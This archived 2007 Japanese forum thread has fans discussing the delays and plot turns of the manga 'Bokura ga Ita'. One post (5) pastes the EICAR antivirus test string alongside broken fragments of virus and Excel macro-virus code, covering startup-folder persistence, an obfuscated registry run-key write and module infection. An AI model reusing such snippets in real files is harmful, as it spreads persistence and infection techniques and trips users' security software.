2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■小畑友紀13〜僕等がいた■

1 :花と名無しさん:2007/11/05(月) 14:52:49 ID:+20kzI5D0
現在、ベツコミ(旧・Betsucomi)で「僕等がいた」第3部(最終章)好評連載中。
アキから矢野に会いに行こうと誘われるが「どうして矢野が会いに来ないのにあたしが会いに行くの?」と断る七美。
竹内はアキから矢野の事を聞いていた。七美は不安定な気持ちのまま自分の誕生日を竹内と過ごす為に待ち合わせ場所に向かう…
過去スレ
■小畑友紀12〜僕等がいた■(DAT落ち)
http://anime2.2ch.net/test/read.cgi/gcomic/1189008046/
■小畑友紀11〜僕等がいた■
http://anime2.2ch.net/test/read.cgi/gcomic/1181776923/
■小畑友紀10〜僕等がいた■
http://anime2.2ch.net/test/read.cgi/gcomic/1173676918/
■小畑友紀9〜僕等がいた■
http://anime2.2ch.net/test/read.cgi/gcomic/1166369864/
■小畑友紀8〜僕等がいた■
http://comic6.2ch.net/test/read.cgi/gcomic/1163616358/
■小畑友紀7〜僕等がいた■
http://comic6.2ch.net/test/read.cgi/gcomic/1157821169/
■小畑友紀6〜僕等がいた■
http://comic6.2ch.net/test/read.cgi/gcomic/1152989372/
■小畑友紀5〜僕等がいた■
http://comic6.2ch.net/test/read.cgi/gcomic/1145199225/
■小畑友紀4〜僕等がいた■
http://comic6.2ch.net/test/read.cgi/gcomic/1132329627/
■小畑友紀3〜僕等がいた■
http://comic6.2ch.net/test/read.cgi/gcomic/1119329076/
女版冨樫?小畑友紀2〜僕等がいた
http://comic6.2ch.net/test/read.cgi/gcomic/1094379361/
【僕等がいた】小畑友紀【別コミ】
http://comic6.2ch.net/test/read.cgi/gcomic/1059205906/

2 :花と名無しさん:2007/11/05(月) 14:55:10 ID:+20kzI5D0
コミックスは
●きみの勝ち
●スキ キライ 好き。
●まる三角しかく 全2巻
●スミレはブルー 1〜2巻
●僕等がいた 1〜12巻 & ファンブック
が好評発売中です。

■関連サイト■
僕等がいたアニメ公式
ttp://www.bokuragaita.com/
ベツコミ
ttp://www.betsucomi.shogakukan.co.jp/
僕等がいたデジタルHR
ttp://www.betsucomi.shogakukan.co.jp/bokura/

■関連スレ■
僕等がいた 5(アニメ板)
http://anime2.2ch.net/test/read.cgi/anime2/1167847275/

3 :花と名無しさん:2007/11/05(月) 14:57:18 ID:???0
一応連載中なのにDAT落ちするってどんだけ〜
適当にドゾー

4 :花と名無しさん:2007/11/05(月) 16:21:36 ID:???O
>>1

今月号って掲載されるの?

5 :花と名無しさん:2007/11/05(月) 17:40:47 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/11/06(火) 13:04:59 ID:???O
結局ドラマ化はガセだったな
亀梨は別なドラマやるの決まったし

7 :花と名無しさん:2007/11/07(水) 00:22:45 ID:???O
ガセでほんまよかったわ
このスレも落ちたら嫌なのであげときます


8 :花と名無しさん:2007/11/07(水) 09:52:20 ID:uBbGsHtz0
>>4
ウェブに載ってないね・・・

9 :花と名無しさん:2007/11/09(金) 16:40:26 ID:???0
この調子じゃまたDAT落ちするぞ…

10 :花と名無しさん:2007/11/09(金) 17:49:47 ID:???0
原稿も落ちますか?

11 :花と名無しさん:2007/11/09(金) 17:56:36 ID:???O
>>8
だよね・・・
>>10
笑えねーよw

12 ::2007/11/10(土) 11:15:20 ID:n7UAnTNpO
13巻ていつでるんですか?

13 :花と名無しさん:2007/11/10(土) 16:42:31 ID:???0
携帯様定番の質問キター

14 :花と名無しさん:2007/11/11(日) 22:06:44 ID:???0
バレきてたけど・・・竹内可哀想すぎるよ。・゚・(ノД`)・゚・。
しかも次号別の話の読みきりってなんじゃそりゃ。
いい加減にして欲しい。

15 :花と名無しさん:2007/11/11(日) 22:23:40 ID:???0
完全に詰まってるんだね
そうなんだねオバタン

16 :花と名無しさん:2007/11/11(日) 22:30:02 ID:???0
七美と竹内、矢野の芋でハピーエンドでいいじゃん
矢野は自分で選んでるんだから別にいいけど
ここまで引っ張って竹内にその仕打ちは酷い…

17 :花と名無しさん:2007/11/11(日) 22:33:23 ID:???0
今月も24pで次号は読みきりって舐めてるのか

18 :花と名無しさん:2007/11/11(日) 23:02:51 ID:???0
妹との同棲の理由が糞すぎて笑える

19 :花と名無しさん:2007/11/11(日) 23:57:06 ID:???0
バレ読んだけど、本当に全ての流れが嫌。
何でいい具合に終ってくれないの?って思う。
もういい加減飽きたから、とっとと終了して次の連載して欲しい・・

20 :花と名無しさん:2007/11/12(月) 00:25:36 ID:???0
バレってどこにあるのですか?偉い人。
もうこの漫画あらすじ読むだけでいいね。
ああ、必死で引き伸ばしてるな〜って笑えるw

21 :花と名無しさん:2007/11/12(月) 00:44:54 ID:???0
ここです。
http://anime2.2ch.net/test/read.cgi/gcomic/1194659282/

22 :花と名無しさん:2007/11/12(月) 06:27:59 ID:???0
こんなんならアニメと同じく駅で別れて終わりで良かったよ…

23 :花と名無しさん:2007/11/12(月) 07:32:45 ID:???O
どんどんつまらなくなりますな…
8巻までがピークか。
つぅか、これで矢野は芋と一緒に溺れて
七美は一人で生きていけばいいよ。
あの頃は純粋な僕等がいたねエンド。

24 :花と名無しさん:2007/11/12(月) 09:32:41 ID:???0
>>21
親切な方ありがとう。
別コミで一番売れてるだろうし、
編集部全体で引き伸ばしにかかってるような気がする。

25 :花と名無しさん:2007/11/12(月) 09:32:57 ID:nbam7bfLO
糞過ぎて萎えた。竹内かわいそ。芋との同居理由も糞。一気に萎えた。
今後はナナ矢野芋で一悶着あって最終的に「もう開放してあげるわ」
の芋の一言でナナ矢野のハッピーエンドなんでしょ。
糞すぎる。

26 :花と名無しさん:2007/11/12(月) 09:47:46 ID:???0
偶然矢野と七美が会う

偶然芋が目撃

芋首つり

矢野失踪

27 :花と名無しさん:2007/11/12(月) 09:49:41 ID:???0
>>26
ちょw無限ループすぎwww

28 :花と名無しさん:2007/11/12(月) 10:16:03 ID:NzMx/5rk0
死んで気を引くなんて中森明菜とか(立ち直ったけど)宮沢りえみたい。
山芋なんか間違ってる、矢野を引き寄せる方法がよりにもよって死だなんて。

29 :花と名無しさん:2007/11/12(月) 11:13:24 ID:???O
矢野を振り向かせるための狂言自殺。
あの女ならやりそう。

30 :花と名無しさん:2007/11/12(月) 12:13:55 ID:???O
矢野には「死」が1番こたえるからねぇ

はっ!?ヒラメいた
七美が自殺未遂すればいいんだ!!!!!

31 :花と名無しさん:2007/11/12(月) 13:12:59 ID:???0
カットされてたけど
舞花がアパートで発見した芋は自殺未遂中だったんだね

32 :花と名無しさん:2007/11/12(月) 14:07:46 ID:HzzpWEhEO
スミレはブルーの番外編から絵が嫌いになった。
前は絵も話も好きだったのに残念。

33 :花と名無しさん:2007/11/12(月) 14:53:22 ID:???O
竹内のプロポーズを断って七海は1人で生きていくってこと?

34 :花と名無しさん:2007/11/12(月) 17:03:34 ID:???0
竹内が可哀相すぎるわ
どこをどう見ても矢野より竹内の方がいい男だし七美のこと大切にしてくれてるのに
矢野七美山本は死んでいいよ

35 :花と名無しさん:2007/11/12(月) 17:28:57 ID:???0
別に矢野は可哀想とは思わない
竹内が気の毒すぎて
七美は独り立ちエンドでいい

36 :花と名無しさん:2007/11/12(月) 19:37:13 ID:???0
でも中途半端な気持ちで結婚されてもそれはそれで嫌だろ
かわいそうとかじゃなくて竹内が他の人を選べばいいだけ

37 :花と名無しさん:2007/11/12(月) 20:33:39 ID:???0
竹内は振られて正解
七美と結婚してもふらふらされそう

というかどろどろ過ぎるんですが。
もうちょっとさらっといけばいいのに

38 :花と名無しさん:2007/11/12(月) 21:14:36 ID:???O
矢野は芋と一生過ごして七美は一人ENDでいい
竹内だけは誰かいい人見つけて幸せになってほしいな

39 :花と名無しさん:2007/11/12(月) 21:53:57 ID:???O
竹内の幸せだけを見届けることにする。

40 :花と名無しさん:2007/11/12(月) 21:57:18 ID:1rIbS3A50
38>同意

ミクシィで辛口意見投稿したら「最後まで見守りましょう」って
いいこちゃん発言がでちゃったよ

41 :花と名無しさん:2007/11/12(月) 22:28:16 ID:???0
未完のままフェードアウトしそうです

42 :花と名無しさん:2007/11/12(月) 22:45:25 ID:???0
作者も大人にしちゃって失敗したなって思ってるんじゃないの
なんか嫌々描いてる感じ

43 :花と名無しさん:2007/11/12(月) 23:21:46 ID:???0
嫌々感ビシバシ伝わってくるねー
ほんと未完のまんまいつフェードアウトしてもおかしくない感じ・・・

44 :花と名無しさん:2007/11/12(月) 23:31:17 ID:???O
ヤダヤダ
矢野と七美でHappy end キボンキボン

45 :花と名無しさん:2007/11/13(火) 08:27:11 ID:???O
バレ来てるみたいだけでそれって来月の?
webで今月号の紹介に僕等載ってないんだが

46 :花と名無しさん:2007/11/13(火) 12:01:12 ID:???0
今日発売のでしょ

47 :花と名無しさん:2007/11/13(火) 18:20:06 ID:+9S1u1MjO
矢野と復活しても、信じられなくなりそう。

48 :花と名無しさん:2007/11/13(火) 19:10:42 ID:???O
>>30
高校時代にすでに実施済み

49 :花と名無しさん:2007/11/13(火) 22:18:15 ID:???0
24ページのためにベツコミ買うのやだな

50 :花と名無しさん:2007/11/14(水) 01:33:21 ID:da6izxW7O
竹内って最後まで可哀想な人だなw
次が2月発売号ってw
どんだけ待たすんだよ

51 :花と名無しさん:2007/11/14(水) 12:07:14 ID:???O
矢野の例えだと、助けなかった方は
どっちにしろ死ぬがな

52 :花と名無しさん:2007/11/14(水) 14:52:16 ID:???0
こんな糞漫画に成り下がるとは思わなかった

53 :花と名無しさん:2007/11/14(水) 16:40:06 ID:???0
七美矢野エンドだとあの頃までは思っていました。あの頃までは…
んだよこのドロドロ…ハピエンドは期待できんじゃんよ

54 :花と名無しさん:2007/11/14(水) 16:49:55 ID:???O
これは、みんなそれぞれの道へエンドか?

そのほうがまるーくおさまるな。

55 :花と名無しさん:2007/11/14(水) 19:11:22 ID:???O
どうせ矢野に会いに行くも拒否られてプライド傷付いて竹内の所にトンボ帰りだろ、七美

56 :花と名無しさん:2007/11/14(水) 22:25:08 ID:???0
今更くっついても何だかなぁって思うし
かといってバラバラでも何のために引き伸ばしたんだか分からんし
完全にやめ時を間違えたな

57 :花と名無しさん:2007/11/14(水) 23:28:18 ID:???0
休載しまくりなのがムカつくぅ

正々堂々とやってくれ〜


58 :花と名無しさん:2007/11/15(木) 00:14:11 ID:BFdCVfrx0
失恋するくらいで死ぬんだったらみんな
死んでるよ?→山芋。

59 :花と名無しさん:2007/11/15(木) 00:26:43 ID:???0
それだけ矢野に依存してたんだろ

60 :花と名無しさん:2007/11/15(木) 01:17:08 ID:???O
まだ高校ん時の芋のがたくましいぢゃん(;´Д`)
つかまだまし?

61 :花と名無しさん:2007/11/15(木) 01:29:01 ID:???0
矢野には山芋がお似合い
勝手にやってろ
しかし、2月連載再開で来月読みきりって…
さっさと終わらせろよ

62 :花と名無しさん:2007/11/15(木) 12:44:07 ID:???0
休載休載・・・ちょっとやりすぎな気がする
こういうことってよくあるの?
ハンターハンター二の舞の前兆?

63 :花と名無しさん:2007/11/15(木) 15:17:06 ID:???O
もう、矢野とななみが会う→芋が発見→
芋狂ってななみ刺す→ななみ死亡
でも良いから、早く終わらせてほしい

64 :花と名無しさん:2007/11/15(木) 15:35:16 ID:???0
山芋との同棲知ったらどう思うんだろう
それでも泣かないのかな

65 :花と名無しさん:2007/11/15(木) 16:03:45 ID:???0
しかし発売後なのに過疎ってるね。
みんなもう興味もなくなったんだろうな。
このまま未完で放置だけはやめてくれ。

66 :花と名無しさん:2007/11/15(木) 16:11:21 ID:???O
グダグダだったけど
今回なぜか泣けた…

67 :花と名無しさん:2007/11/15(木) 19:11:36 ID:???0
七美は一人で頑張って生きてもらいたいが
どうせ一悶着して最後は矢野エンドになるかと思うと萎える

68 :花と名無しさん:2007/11/15(木) 20:33:25 ID:???0
山本の一人勝ちって言うのもかなりムカつくから、
矢野には何かしら行動してほしいと思う。つーか、ここで
竹内断るの信じられない。七美に対してというより、作者に
対して苛立ちを感じる。一体いつまで引っ張れば気が済むんだろう・・

69 :花と名無しさん:2007/11/15(木) 21:11:02 ID:???0
最終回予想

矢野と山芋はうまい事都合つけて結局破局。
さらに数年後、立派な編集者としてバリバリ働く七美。もちろん独身。
そして設計で有名になってる矢野。
どっかでバッタリ出会う。
マリモのストラップを見て、なぜかすべてのわだかまりが解けホロリと泣く七美。
「この道が繋がってた。何度でも君と恋に落ちよう」とかってモノローグで 終 わ り 

こんなんどう?40ページくらいあればいつでも終われそうw

70 :花と名無しさん:2007/11/15(木) 21:21:05 ID:???0
もうそれでいいよ

71 :花と名無しさん:2007/11/15(木) 21:25:14 ID:???0
七美と出会うか出会わないかの寸前で矢野がしぬしかない
しかも山芋が原因の事故かなんかで

72 :花と名無しさん:2007/11/15(木) 21:59:19 ID:???0
ヤリ捨てされた妹もかわいそうだけどね

73 :花と名無しさん:2007/11/15(木) 23:42:33 ID:1UsaR69oO
むしろそれぞれの道エンドでいいよ。

矢野と戻ったってわだかまりは残りそうだし

74 :花と名無しさん:2007/11/15(木) 23:48:39 ID:???0
ここまできたら無理矢理くっ付けるのはやめて欲しい
七美が過去の矢野を思い出してグズグズっていうパターン飽きた

75 :花と名無しさん:2007/11/16(金) 00:40:59 ID:7IUhFSFa0
もう矢野と竹内の友情HappyEndでいいよ

76 :花と名無しさん:2007/11/16(金) 01:41:43 ID:49wfYyPH0
矢野、アキに「同情で一緒にいる」って宣言してるようなもんだ
「溺れかけてたら弱いものを助けるって」それとも睡眠薬飲む位の
精神状態だった頃に自分を必要としてくれてる山芋にほだされたとか?


77 :花と名無しさん:2007/11/16(金) 04:09:28 ID:???0
今後、アキ竹内がくっつくフォローがなされるんだろな。

78 :花と名無しさん:2007/11/16(金) 09:33:06 ID:???0
ほだされたっていうか、自分のせいで前にも母親が自殺しちゃったというトラウマから
ほっとけなくて一緒に住む事になったんじゃない?

かなり前に山芋自殺未遂→矢野をひきつけるための最終手段、をしそう
とうっすら思ったから、その通りの展開で萎えた。
高校の頃が懐かしいよ。こんな欝展開はイヤだ。

79 :花と名無しさん:2007/11/16(金) 10:03:33 ID:???0
>>77
3部はアキだけ孤軍奮闘だしね。
もしこの新キャラ創れてなかったらと思うと・・・

80 :花と名無しさん:2007/11/16(金) 19:05:49 ID:???0
なんか、カレカノといい、フルバといい、僕等といい、
有名監督に目つけられてアニメ化した作品ってア
ニメ終わった途端にとんでもない鬱展開が
その後ダラダラと長期間にわたり行われるな。

81 :花と名無しさん:2007/11/16(金) 20:04:50 ID:j2QMQAq30
山芋の「山」って、どこからきてんの?
南海キャンディーズの山ちゃんに似てるから?

82 :花と名無しさん:2007/11/16(金) 20:11:37 ID:???O
>>81
名字が山本

83 :花と名無しさん:2007/11/16(金) 20:13:05 ID:???O
>>81
名字が山本だから

84 :花と名無しさん:2007/11/16(金) 21:25:47 ID:???0
名字が山本だから

85 :花と名無しさん:2007/11/16(金) 23:57:42 ID:???0
自演の質まで目を覆うものが

86 :花と名無しさん:2007/11/17(土) 00:01:27 ID:???0
結末はもう決まってるのかな
これから決めるのかな

87 :花と名無しさん:2007/11/17(土) 00:21:26 ID:???0
同じように溺れていたら山を助けると思ってた
でもいざという時にはとっさに七を選んでた
心に嘘はつけないと気付く
矢野高橋EDへ

じゃないかと思った

88 :花と名無しさん:2007/11/17(土) 01:56:29 ID:???0
正統派できれいにまとまるね〜

でも矢野と山芋身体の関係あったら難しくない?
あると思いますか?実際・・

89 :花と名無しさん:2007/11/17(土) 02:06:08 ID:???0
あったら、私はもう無理だなーw
今でもかなり幻滅してるけど。

90 :花と名無しさん:2007/11/17(土) 02:07:36 ID:???0
その辺ははっきり書かれなさそうだね

91 :花と名無しさん:2007/11/17(土) 02:08:18 ID:???0
無いんじゃないかな
そこは漫画だからということで

92 :花と名無しさん:2007/11/17(土) 09:35:44 ID:mFiZqfnv0
山芋は矢野のうんことか平気で食べそう

93 :花と名無しさん:2007/11/17(土) 11:07:03 ID:???0
ttp://www.super3.jp/images/large/dvd_dl/std044/std044_01.jpg
ttp://www.super3.jp/images/large/dvd_dl/std044/std044_02.jpg
ttp://www.super3.jp/images/large/dvd_dl/std042/std042_05.jpg
ttp://www.super3.jp/images/large/dvd_dl/std042/std042_08.jpg
ttp://www.super3.jp/images/large/dvd_dl/std042/std042_09.jpg
ttp://www.super3.jp/images/large/dvd_dl/std042/std042_10.jpg

94 :花と名無しさん:2007/11/17(土) 16:21:05 ID:g9e4ib4OO
もうここからどうやって終わらすんだろ?
誰も幸せになんてならない流れだよね。


95 :花と名無しさん:2007/11/18(日) 03:21:25 ID:???0
誰と誰がくっつくとか、そういう次元の話じゃなくなったねー

96 :花と名無しさん:2007/11/18(日) 04:44:06 ID:???0
竹内いつも「いい人」でちょっとキモイ
七美はきっと竹内と居ても優しいだけで刺激がないから飽きてくるよ
結局矢野の方が魅力的な気がする・・・
竹内はああ見えて実は一番腹黒いタイプっぽくて嫌だな

97 :花と名無しさん:2007/11/18(日) 15:21:33 ID:???0
はいはい

98 :花と名無しさん:2007/11/18(日) 23:25:08 ID:IKo1/7Un0
山芋でも舞花という友達を得た時本当によかったと思ったのに。
舞花まで失ってどうにかこにか矢野を手に入れたとしたら
キモい。

99 :花と名無しさん:2007/11/19(月) 05:38:38 ID:???0
舞花今どうしてるかな〜!

100 :花と名無しさん:2007/11/19(月) 05:41:56 ID:???0
男漁りに精出してるよ

101 :花と名無しさん:2007/11/19(月) 07:47:02 ID:???O
>>96
作者は矢野の不幸萌えで竹内どうでもいいんだよ
竹内はどうでもいいから性格に深みがなくただのいい人設定w

102 :花と名無しさん:2007/11/19(月) 14:36:24 ID:???O
結局、山芋・矢野のどっちか死にそうだな。

自分の気持ち押し付けるだけで「相手への思いやり」がないと楽しくもないししんどいだけ。いつまで中学生の恋してんだっつの、早く終わらせて欲しい。

103 :花と名無しさん:2007/11/20(火) 12:48:45 ID:???O
作者もどうまとめていいのか分からなくなってるっぽい

104 :花と名無しさん:2007/11/20(火) 13:24:58 ID:???0
矢野がナナミの所に戻るのを阻止すべく矢野の前で包丁を持ち出し自殺しようとする
矢野が山芋を庇おうとするが包丁が矢野に刺さり救急車で運ばれる
病院先でナナミと再会、二人の気持ちがずっと思い合っていたと通じ合うが矢野死亡
矢野を殺害した容疑で逮捕される山芋、しかし実は末期の癌で矢野の後を追うように死亡
竹内はナナミの事を考えふら付いているとダンプカーに跳ねられ死亡
竹内や矢野を失ってショックのアキは自殺、水ちん死亡、ララ美死亡
五十年後、山奥でララ春という犬と暮らしながら本を書いているナナミ
編集が作品を取りに来てナナミに声をかけるが、犬と彼女は眠るように死んでいた
ナナミが生涯を書き上げた本が発売され大ヒット、タイトルは「僕等がいた」

105 :花と名無しさん:2007/11/20(火) 14:22:09 ID:???O
>>104
フジの昼ドラの見すぎだよおばちゃん

106 :花と名無しさん:2007/11/20(火) 22:41:31 ID:???O
>>104 水ちん殺すなwww

でも確かに矢野没エンドはかなりありそう

107 :花と名無しさん:2007/11/20(火) 23:23:45 ID:???O
矢野エイズで死亡

108 :花と名無しさん:2007/11/20(火) 23:40:39 ID:???0
好きって努力とは正反対だって

竹内全否定されたね

109 :花と名無しさん:2007/11/21(水) 01:38:59 ID:DvfvDikO0

           ┌v ''''i''''v┐
           (. ){.  |  } .)
.           ( .)゙'ヽ_,ノー'
.          `ー' ,、.┴┴ 、
            ノ >-─|<`ヽ、
            く へ,   V、_,/
          (⌒ヽ\ノ,〉 >'、\/⌒j
         { ヽ、  テ彡⌒ ⌒}  ノ |
         | }  丶 . .,,___ノ、ノ/{ i
         |. {      ■    } |
        ⊆ニゝ     ■   ヽニ⊇

110 :花と名無しさん:2007/11/21(水) 01:41:06 ID:DvfvDikO0
                 ■
                 ■
                _■
              /;;;;;;;;ヽ■⌒ヽ
              /;;;;;;;;;;;;;;;;;;;ヽ■;;;ヽ
             /;;;;;;;;;;;;;;;;;;;;;;;/ヽ■;ヽ
             /;;;;;;;;;;;;;;;;;;;;;;;/  ヽ;;;;ヽ
            /;;;;;;;;;;;;;;;;;;;;;;;/  -ー-ヽ;;;,i
            |;;;;;;;:;;;;;;;;/(●) (●)|;;;;;i
             |;;;;;;;i     、_!   |;;i   ・・・・
             |;;;;;;;ヽ  ´ー==-` /;i
             |;;;;;;ヽ\   ̄  /;i
             |;;;;;;;;;;;;ヽ\   /|;;;i
              |;;;;;;;:;;;;;;;ヽ `´   ;;;ヽ


111 :花と名無しさん:2007/11/21(水) 02:44:07 ID:???0
庸子の遺書と舞花のワケありそうな過去も気になるけどそれどころじゃない感じ

112 :花と名無しさん:2007/11/21(水) 16:05:48 ID:???0
竹内なんで七美なんかが好きなの?
あーもう、どうでもいいわ
とにかく作者が休みまくりなのにいらつく

113 :花と名無しさん:2007/11/22(木) 01:10:46 ID:???0
休みすぎだよね。編集の人とちゃんと話し合って
さっさと纏めて終わらせれば良いのに。

114 :花と名無しさん:2007/11/22(木) 22:21:00 ID:???O
え…・・・っと、2ヶ月待つワケ?

115 :花と名無しさん:2007/11/22(木) 22:24:00 ID:???0
冨樫のように1年休んで華麗に復活!

116 :花と名無しさん:2007/11/23(金) 04:59:49 ID:???O
竹内と七美くっついて
矢野没ってEDが希望なんだけどな

どうせありきたりに矢野と七美くっついて終わるんだろ

117 :花と名無しさん:2007/11/23(金) 06:19:50 ID:???0
竹内はもうないだろうね
撃沈

118 :花と名無しさん:2007/11/23(金) 06:24:36 ID:???0
あきはこうたろうとどうなるんだろう

119 :花と名無しさん:2007/11/23(金) 07:31:33 ID:???O
ピーチガールのとーじと竹内がかぶる 尽くしてんのに全く報われない可哀想な感じが

120 :花と名無しさん:2007/11/24(土) 09:46:15 ID:lzpwe0VwO
休載しまくりなのは
さすがに落ちるしイライラするけど…
ワンパターンじゃないほうがおもしろいやん
だから休載が残念やねんし次まだかってなるやん?
でも最後はやっぱり矢野とななみEND じゃないとあたしは絶対に嫌、
幸せになれましたって終わってくれななんのために読んでてんこの漫画てなるやん

続きほんま気になる!

121 :花と名無しさん:2007/11/24(土) 09:55:31 ID:???O
>>120
七美氏ねまで読んだ

122 :花と名無しさん:2007/11/24(土) 14:56:30 ID:???0
>>120
標準語で書け
キモチワルイ

123 :花と名無しさん:2007/11/24(土) 17:45:04 ID:???O
何処を縦読み?

124 :花と名無しさん:2007/11/24(土) 17:52:47 ID:???0
>>123
休載さすがにワンパターンだから。でも幸せ!

125 :花と名無しさん:2007/11/24(土) 20:04:25 ID:???O
「竹内君の想いに応えてあげたい」と言っておいて結局振るなんて
高尚七美様は気まぐれですね

126 :花と名無しさん:2007/11/26(月) 04:22:53 ID:???O
みんな幸せにはなれない展開

127 :花と名無しさん:2007/11/28(水) 18:24:16 ID:???O
結末なんかどーでもよくなったよ。

128 :花と名無しさん:2007/11/28(水) 23:38:30 ID:???O
そっ、どーでもいいから終わらせてほしい

129 :花と名無しさん:2007/11/29(木) 08:32:05 ID:???0
前から思ってたけど、矢野が幼くなりすぎだよね
1巻の頃のほうがゴツゴツして男っぽいというか大人っぽいw
最初のほうの竹内なんて完全手抜きで脇キャラだし

130 :花と名無しさん:2007/11/30(金) 01:24:41 ID:???O
個人的には矢野七エンドが良いっちゃ良いんだけど、こんな展開はなあ…
結局矢野を失ってから乗り越えようと前を向いて歩いてるのって竹内とアキだけだよね
前ので七海が竹内を選びそうな発言してたから、やっと七海も成長したのかと思ったのに
僕等目当てでベツコミ買ってたけどもうやめよ

131 :花と名無しさん:2007/12/01(土) 00:21:35 ID:???O
>>129 個人的に9巻の矢野は神

132 :花と名無しさん:2007/12/01(土) 20:43:22 ID:???O
今ブックオフに持ってったら全巻いくら位で売れるかな?

133 :花と名無しさん:2007/12/01(土) 21:23:33 ID:???0
ヤフオクで売れば2500円にはなるよ

134 :花と名無しさん:2007/12/01(土) 22:00:11 ID:???0
ドラマ化の話は無くなった?

135 :花と名無しさん:2007/12/03(月) 23:07:06 ID:???O
又落ちちゃうよ
連載が無いんだもん話す事も無いしね

136 :花と名無しさん:2007/12/04(火) 01:19:58 ID:nJ1Eaor00
1月号で続き読めるでしょ。たぶん。

25 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)